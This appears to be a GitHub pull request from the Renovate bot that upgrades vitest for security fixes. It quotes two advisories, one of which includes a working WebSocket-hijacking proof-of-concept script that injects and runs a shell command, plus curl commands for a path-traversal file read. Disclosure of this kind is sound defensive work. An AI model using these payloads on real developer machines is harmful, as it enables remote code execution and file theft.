Skip to content

Update dependency vitest to v3 [SECURITY]#616

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vitest-vulnerability
Open

Update dependency vitest to v3 [SECURITY]#616
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vitest-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Feb 4, 2025

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vitest (source) ~1.2.2~3.2.6 age adoption passing confidence

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.


Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening

CVE-2025-24964 / GHSA-9crc-q9x8-hgqq

More information

Details

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC
  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})
Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Severity

  • CVSS Score: 9.6 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


When Vitest UI server is listening, arbitrary file can be read and executed

CVE-2026-47429 / GHSA-5xrq-8626-4rwp

More information

Details

Summary

Arbitrary file can be read on Windows when Vitest UI server is listening, especially when exposed to the network.

Impact

Only users that match either of the following conditions are affected:

  • explicitly exposes the Vitest UI server to the network (using --api.host or api.host config option)
  • running the Vitest UI or Browser Mode on Windows
Details

The API handler for /__vitest_attachment__ uses the deprecated isFileServingAllowed incorrectly.
https://github.com/vitest-dev/vitest/blob/eb1abf08573032a532015b999ad3501c5e89e3bb/packages/ui/node/index.ts#L77
The function expects the passed value to use cleanUrl after the check before file system related operation.
Because of this, it is possible to bypass the check by \\?\\..\\. This is not possible on Linux as Linux errors if a directory named ? does not exist.

A similar problem exists in other places as well.

That said, this isFileServingAllowed check does not actually prevent the API to be abused. Since the API has rerun feature and file write feature, it's possible to run arbitrary script by writing a script as a test file using saveTestFile and running it using rerun. This means exposing the API / Vitest UI is equivalent to giving script execution access.
On the browser mode side, there're readFile / writeFile / saveSnapshotFile. So exposing the browser mode is equivalent to giving file read / write access.

PoC
  1. Run Vitest UI
  2. Get the API token by curl http://localhost:51204/__vitest__/
  3. Run curl "http://localhost:51204/__vitest_attachment__?path=C:\\path\\to\\project\\?\\..\\..\\secret.txt&amp;contentType=text/plain&amp;token=$TOKEN" (TOKEN is the API token)
  4. curl shows the content of secret.txt that is outside the project directory
Mitigations

Vitest now ships two configuration flags, allowWrite and allowExec, that gate the privileged operations exploited by this vulnerability. Both are disabled by default whenever the API server is bound to a non-localhost host, ensuring that exposing the server to the network no longer implicitly grants write or execute capabilities to remote clients.

When these flags are disabled, the UI also enters a read-only mode: in-browser code editing and test file execution are turned off, removing the attack surface that allowed remote code execution. Many Browser Mode features are also disabled, like attachments, artifacts or snapshots. See browser.api.

Users who require the full interactive UI on a networked host must explicitly opt in by setting allowWrite and/or allowExec to true.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

vitest-dev/vitest (vitest)

v3.2.6

Compare Source

v3.2.5

Compare Source

v3.2.4

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.2.3

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v3.2.2

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v3.2.1

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.2.0

Compare Source

   🚀 Features
   🐞 Bug Fixes
    View changes on GitHub

v3.1.4

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.1.3

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.1.2

Compare Source

   🐞 Bug Fixes
   🏎 Performance
    View changes on GitHub

v3.1.1

Compare Source

   🐞 Bug Fixes
    View changes on GitHub

v3.1.0

Compare Source

🚀 Features
🐞 Bug Fixes
🏎 Performance
View changes on GitHub

v3.0.9

Compare Source

   🐞 Bug Fixes

Note

PR body was truncated to here.


Configuration

📅 Schedule: (in timezone UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the dependencies Pull requests that update a dependency file label Feb 4, 2025
@lobehubbot

Copy link
Copy Markdown
Member

👍 @renovate[bot]

Thank you for raising your pull request and contributing to our Community
Please make sure you have followed our contributing guidelines. We will review it as soon as possible.
If you encounter any problems, please feel free to connect with us.
非常感谢您提出拉取请求并为我们的社区做出贡献,请确保您已经遵循了我们的贡献指南,我们会尽快审查它。
如果您遇到任何问题,请随时与我们联系。

@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from d00e1c0 to a70de53 Compare February 9, 2025 14:15
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Feb 9, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from a70de53 to ae66f1a Compare February 9, 2025 17:11
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Feb 9, 2025
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Mar 3, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 824d5ab to 613304b Compare March 3, 2025 19:34
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Mar 3, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 613304b to e633b77 Compare March 11, 2025 10:53
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Mar 11, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from e633b77 to 7cbd56f Compare March 11, 2025 22:59
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Mar 11, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 7cbd56f to b022dab Compare March 13, 2025 15:33
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Mar 13, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from b022dab to 9ce30ee Compare March 13, 2025 19:54
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Mar 13, 2025
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Mar 17, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 9ce30ee to cf1675a Compare March 17, 2025 13:36
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Mar 17, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from cf1675a to a7b4039 Compare March 17, 2025 20:32
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Apr 1, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 88ba19b to dadfa0e Compare April 1, 2025 19:27
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Apr 1, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from dadfa0e to 74211f4 Compare April 24, 2025 08:48
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Apr 24, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 74211f4 to 8370abb Compare April 24, 2025 17:24
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Apr 24, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 6cc55c6 to 157f610 Compare May 28, 2025 08:30
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] May 28, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 157f610 to 145132b Compare May 28, 2025 16:49
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] May 28, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 145132b to 0b2a326 Compare June 4, 2025 06:45
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Jun 4, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 0b2a326 to bf72bb0 Compare June 4, 2025 13:34
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Jun 4, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from bf72bb0 to 3e896ff Compare June 18, 2025 07:02
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Jun 18, 2025
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Jun 18, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 75ddc29 to 23cd8f9 Compare June 22, 2025 15:01
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Jun 22, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 23cd8f9 to 9f1a1ce Compare June 22, 2025 17:39
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Jun 22, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 9f1a1ce to 9a13681 Compare July 2, 2025 15:01
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Jul 2, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 9a13681 to ac5edb9 Compare July 2, 2025 21:00
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Jul 2, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from ac5edb9 to e99cb27 Compare July 28, 2025 11:39
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Jul 28, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from e99cb27 to 17db546 Compare July 28, 2025 17:14
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Jul 28, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 17db546 to 4093d17 Compare August 10, 2025 13:34
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.1 [SECURITY] Update dependency vitest to ~1.6.0 [SECURITY] Aug 10, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 4093d17 to 74b6a90 Compare August 10, 2025 17:20
@renovate renovate Bot changed the title Update dependency vitest to ~1.6.0 [SECURITY] Update dependency vitest to ~1.6.1 [SECURITY] Aug 10, 2025
@renovate
renovate Bot force-pushed the renovate/npm-vitest-vulnerability branch from 74b6a90 to 87085a6 Compare August 13, 2025 16:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant